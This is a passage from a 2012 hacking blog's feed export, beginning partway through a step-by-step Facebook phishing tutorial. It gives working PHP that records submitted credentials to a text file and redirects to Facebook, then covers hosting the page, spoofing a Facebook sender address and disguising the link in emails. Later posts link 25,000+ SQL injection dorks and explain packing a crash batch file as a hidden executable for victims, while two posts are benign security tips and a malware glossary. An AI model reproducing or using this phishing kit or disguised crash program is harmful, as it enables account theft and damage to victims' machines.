as&amp;nbsp;&lt;/div&gt;&lt;div&gt;&quot;index.PHP&quot; (not htm!)&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;THREE!:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Now that we changed the action to next.php, we should also make a &quot;next.php&quot;. open up notepad again. And write this:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&amp;nbsp;&amp;lt;?php&lt;br /&gt;header(&quot;Location: http://www.Facebook.com/login.php &quot;);&lt;br /&gt;$handle = fopen(&quot;passwords.txt&quot;, &quot;a&quot;);&lt;br /&gt;foreach($_GET as $variable =&amp;gt; $value) {&lt;br /&gt;fwrite($handle, $variable);&lt;br /&gt;fwrite($handle, &quot;=&quot;);&lt;br /&gt;fwrite($handle, $value);&lt;br /&gt;fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;}&lt;br /&gt;fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;fclose($handle);&lt;br /&gt;exit;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/blockquote&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Save this as &quot;next.php&quot;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Note: for security you should rename &quot;passwords.txt&quot; to something else.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;now make a text file called &quot;passwords.txt&quot; or whatever you renamed the file to in the &quot;next.php&quot;, leave this document blank.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;FOUR!:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Upload the 3 files &quot;index.php&quot;, &quot;next.php&quot; and &quot;passwords.txt&quot; (or&amp;nbsp;&lt;/div&gt;&lt;div&gt;whatever the password file is called) to a subdomain hosting site. THEY&amp;nbsp;&lt;/div&gt;&lt;div&gt;MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com.&amp;nbsp;&lt;/div&gt;&lt;div&gt;When you made an account you should upload the 3 files.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Congratz. You have yourself a working Phisher site!&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;FIVE!:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;now we would like to send spoof emails out. To do that we should first&amp;nbsp;&lt;/div&gt;&lt;div&gt;make an email account. which starts with facebook@. or something that&amp;nbsp;&lt;/div&gt;&lt;div&gt;looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this &quot;facebook@noreply.com&quot; soemthing like that. but eventually that would cost. When your email is set go to step six.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;SIX!:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;remove the hyperlink from this link:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;http:/www.facebook.com/n/?reqs.php&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mark it and push the Add hyperlink button&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://img117.imageshack.us/img117/6243/screen2jj5.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;160&quot; src=&quot;http://img117.imageshack.us/img117/6243/screen2jj5.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Add hyperlink button in the red circle. now write your phisher page url&amp;nbsp;&lt;/div&gt;&lt;div&gt;in the hyperlink bar that appears after clicking the button. and click&amp;nbsp;&lt;/div&gt;&lt;div&gt;add. The hyperlink should still display&amp;nbsp;&lt;/div&gt;&lt;div&gt;http:/www.facebook.com/n/?reqs.php&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;but lead to your phisher page.. Thats pretty kewl. Now i belive your&amp;nbsp;&lt;/div&gt;&lt;div&gt;ready to send your spoof emails to everybody you know. and hopefully&amp;nbsp;&lt;/div&gt;&lt;div&gt;some of them will fall for it..&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enjoy.. ;)&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/1182660017427142232/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-hack-facebook-accounts-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/1182660017427142232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/1182660017427142232'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-hack-facebook-accounts-with.html' title='How To Hack Facebook Accounts with Phishing [Step by Step]'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-cD3iNwNnIog/TtWY_mT9GuI/AAAAAAAAANU/eDl9J6Ezjew/s72-c/phis.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-3725063772965100796</id><published>2012-03-13T15:57:00.001+05:30</published><updated>2012-03-13T15:57:56.579+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Dorks"/><category scheme="http://www.blogger.com/atom/ns#" term="SQLi"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>Collection of 25000+ SQL Injection Google Dorks</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;267&quot; src=&quot;http://2.bp.blogspot.com/--IYKVXBBPSM/T0UW_vVm51I/AAAAAAAAAQ8/zpvVTVlvWRk/sql_injection_thumb%25255B1%25255D.jpg&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;The&amp;nbsp;almighty &lt;/span&gt;&lt;a href=&quot;http://google.com/&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;Google&lt;/a&gt;&amp;nbsp;is just a search engine for common users, but, for hackers this search engine helps them to use Google Dorks (Kinda God Gift For Newbies)&amp;nbsp;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;Many types of Dorks are used for this&amp;nbsp;purpose-&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;But here I have a vast collection of more than&amp;nbsp;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;25000+&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&amp;nbsp;SQLi google dorks:- &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://pastebin.com/zzTkMvjj&quot;&gt;Basic SQLi Dorks&lt;/a&gt;&amp;nbsp;(2450+ dorks)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://pastebin.com/MkUiXtrH&quot;&gt;Modified SQLi Dorks&lt;/a&gt;&amp;nbsp;(4350+ dorks)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://pastebin.com/7gCE0bkF&quot;&gt;Other SQLi Dorks&lt;/a&gt;&amp;nbsp;(13000+ dorks)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://pastebin.com/Wt7wLWSw&quot;&gt;New SQLi Dorks&lt;/a&gt;&amp;nbsp;(4350+ dorks)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/3725063772965100796/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/collection-of-25000-sql-injection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3725063772965100796'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3725063772965100796'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/collection-of-25000-sql-injection.html' title='Collection of 25000+ SQL Injection Google Dorks'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/--IYKVXBBPSM/T0UW_vVm51I/AAAAAAAAAQ8/zpvVTVlvWRk/s72-c/sql_injection_thumb%25255B1%25255D.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-4321572323423345619</id><published>2012-03-13T15:57:00.000+05:30</published><updated>2012-03-13T15:57:31.060+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Batch programming"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="virus"/><title type='text'>How to Crash PC using E Bomb</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;270&quot; src=&quot;http://openclipart.org/people/utrescu/logicbomb.svg&quot; width=&quot;320&quot; /&gt;&lt;/div&gt;&lt;br /&gt;WHAT IS AN E-BOMB ??&lt;br /&gt;&lt;br /&gt;An E-Bomb is some kind of program that opens many windows, and crashes the target computer.&lt;br /&gt;&lt;br /&gt;This guide can be followed by any one, but the only problem is getting the victim to open the executable file.&lt;br /&gt;&lt;br /&gt;First of all, download this and follow the below&amp;nbsp;illustrated steps&amp;nbsp; :&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.mediafire.com/?6dc4b3dbrd1u08q&quot;&gt;Download QuickBFC here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HOW TO MAKE AN E-Bombs??&lt;br /&gt;&lt;br /&gt;Instructions:&lt;br /&gt;&lt;br /&gt;1. Open Notepad, then copy and paste the code from &lt;a href=&quot;http://pastebin.com/qqr0FYjH&quot;&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Save it as File Name.bat (Remember the .bat)&lt;br /&gt;&lt;br /&gt;3. Open “QuickBFC”, the program you’ve just downloaded.Once open, click open in the program and browse for your batch file you made earlier. Now, you will make it into an executable file. but first, we need to change a settings of the program. Go to “Options” and select “Ghost Application” as the output type. If you don’t, then a command prompt window opens and gives your file away.&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/4321572323423345619/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-crash-pc-using-e-bomb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/4321572323423345619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/4321572323423345619'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-crash-pc-using-e-bomb.html' title='How to Crash PC using E Bomb'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-2782416715758502723</id><published>2012-03-12T16:23:00.000+05:30</published><updated>2012-03-13T06:47:03.221+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>8 Top Facebook Security Tips</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://www.topnews.in/files/facebook_logo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://www.topnews.in/files/facebook_logo.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;World wide web is now expending, Internet has successfully turn the whole world into a village and for doing this social networks played and playing an important role, in the era of social networks there is a facebook, &amp;nbsp;Facebook has a large number of user&#39;s and it is on hit list of attacker&#39;s and scam-er.&lt;br /&gt;While you are using facebook or any social networking website there is a need to protect your information by using effective privacy techniques.&lt;br /&gt;This article will talk about some security issues and their countermeasure on facebook or it can be applicable on other social networking websites.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Strong Passwords&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You must care about your passwords, make sure you have a strong password that contain capital letters,small letters,numbers and special characters. Use different password for different online accounts, your password must not related to some of your information, do not use such a words that are easily available on dictionary. To learn more about dictionary attack click here.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Secure Browsing&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;It is good practice to keep yourself up to date means make sure that you are using update OS and browser to avoid browser exploitation attack, use secure connection (HTTPS) where possible to avoid sniffing.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Computer Security &amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;It is very important to stay secure on web, make sure your computer does not contain any sort of keyloggers, RAT (remote administration tool) and istealer or some other things like this. Use a smart antivirus and firewall solution to remain secure, if you think that your computer got affected by some malware and than follow the procedure to fight with.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Personal Information&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Avoid to put so much information about yourself on facebook profile, a hacker might be use these information to hack your password by using reverse engineering technique, or an attacker might create a dictionary by using your information to launch a password based attack.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Profile Privacy Setting&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;It is recommended to make your profile as a privacy master profile, hide your information from those people to whom you never trust and from those people who are new to you, disable each and everything from those who have not added into your profile as a friend, because there is chance that someone watching your activities.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Application Setting&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Each facebook application has a default setting and when you allow any application to use, it means that you have signed an agreement and the developer of this application may watch all of your activities and can get your password, can update your status and more, so avoid applications as much as possible. To learn more about application spamming click here.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Account Security&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;It is good practice to add different email address for your single profile and must connect your mobile phone with your profile, in case if you lost your account than you have an ability to prove as a owner of this account, lean more security to protect your account.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: large;&quot;&gt;More Tips&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; You must not share your password to any one.&lt;br /&gt;&amp;nbsp; &amp;nbsp; Disable your browser from saving your password.&lt;br /&gt;&amp;nbsp; &amp;nbsp; Avoid to sign in your account when you are in public place.&lt;br /&gt;&amp;nbsp; &amp;nbsp; If you are using wireless LAN(WLAN) than must think about firesheep.&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/2782416715758502723/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/8-top-facebook-security-tips.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2782416715758502723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2782416715758502723'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/8-top-facebook-security-tips.html' title='8 Top Facebook Security Tips'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-5029529640256643019</id><published>2012-03-12T12:35:00.002+05:30</published><updated>2012-03-13T06:46:31.468+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="virus"/><title type='text'>What are Trojan / Worm / Virus / Logic Bomb??</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;http://2.bp.blogspot.com/-Aa9yD5pBG-s/T1ibjP0qCGI/AAAAAAAAFK4/V2CcslaosSg/s320/Albania+is+the+most+Malware+infected+Nation.jpg&quot; width=&quot;320&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;We generally hear some terms like&amp;nbsp;Trojan / Worm / Virus / Logic Bomb,etc..&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;By the way what are these???&lt;br /&gt;Read and know about them below:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;Trojan:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Remember the Trojan Horse? Bad guys hid inside it until they could get&lt;br /&gt;into the city to do their evil deed. A trojan computer program is&lt;br /&gt;similar. It is a program which does an unauthorized function, hidden&lt;br /&gt;inside an authorized program. It does something other than what it&lt;br /&gt;claims to do, usually something malicious (although not necessarily!),&lt;br /&gt;and it is intended by the author to do whatever it does. If it&#39;s not&lt;br /&gt;intentional, its called a &#39;bug&#39; or, in some cases, a feature &amp;nbsp;Some&lt;br /&gt;virus scanning programs detect some trojans. Some virus scanning&lt;br /&gt;programs don&#39;t detect any trojans. No virus scanners detect all&lt;br /&gt;trojans.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Virus:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;A virus is an independent program which reproduces itself. It may&lt;br /&gt;attach to other programs, it may create copies of itself (as in&lt;br /&gt;companion viruses). It may damage or corrupt data, change data, or&lt;br /&gt;degrade the performance of your system by utilizing resources such as&lt;br /&gt;memory or disk space. Some virus scanners detect some viruses. No&lt;br /&gt;virus scanners detect all viruses. No virus scanner can protect&lt;br /&gt;against &quot;any and all viruses, known and unknown, now and forevermore&quot;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Worm:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Made famous by Robert Morris, Jr. , worms are programs which reproduce&lt;br /&gt;by copying themselves over and over, system to system, using up&lt;br /&gt;resources and sometimes slowing down the systems. They are self&lt;br /&gt;contained and use the networks to spread, in much the same way viruses&lt;br /&gt;use files to spread. Some people say the solution to viruses and worms&lt;br /&gt;is to just not have any files or networks. They are probably correct.&lt;br /&gt;We would include computers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Logic Bomb:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Code which will trigger a particular form of &#39;attack&#39; when a&lt;br /&gt;designated condition is met. For instance, a logic bomb could delete&lt;br /&gt;all files on Dec. 5th. Unlike a virus, a logic bomb does not make&lt;br /&gt;copies of itself.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/5029529640256643019/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/what-are-trojan-worm-virus-logic-bomb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' 